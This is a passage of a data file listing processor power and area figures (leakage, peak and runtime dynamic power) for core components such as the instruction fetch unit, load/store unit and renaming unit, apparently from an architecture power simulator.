'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.30651,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175856,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176554,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68549,
'Instruction Fetch Unit/Runtime Dynamic': 0.431399,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00567966,
'L2/Runtime Dynamic': 0.00181095,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49482,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.606984,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0406895,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0406894,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68696,
'Load Store Unit/Runtime Dynamic': 0.848339,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100333,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200666,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356086,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0356682,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205586,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0289046,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.422865,
'Memory Management Unit/Runtime Dynamic': 0.0645729,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6035,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00786459,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0889693,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0968338,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.00157,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174456,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281392,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.142037,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597885,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199528,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21331,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00731748,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0529148,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0541173,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0529148,
'Execution Unit/Register Files/Runtime Dynamic': 0.0614348,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111477,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.292084,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55947,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233642,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233642,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00211788,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865185,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000777399,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756812,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194409,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0520243,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.3092,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175885,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176698,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68831,
'Instruction Fetch Unit/Runtime Dynamic': 0.431617,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00569493,
'L2/Runtime Dynamic': 0.0018099,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49708,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.608061,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0407628,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0407627,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68957,
'Load Store Unit/Runtime Dynamic': 0.849851,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100514,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.201028,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356728,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0357325,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205754,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0289097,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.423142,
'Memory Management Unit/Runtime Dynamic': 0.0646422,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6095,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00787099,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0890453,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0969163,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.00431,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.171484,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.276597,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.139617,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.587698,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.196128,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.20665,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0071928,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0520131,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0531952,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0520131,
'Execution Unit/Register Files/Runtime Dynamic': 0.060388,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.109577,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.287067,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.54322,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00230096,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00230096,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00208598,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000852284,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000764153,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00745207,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0191372,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
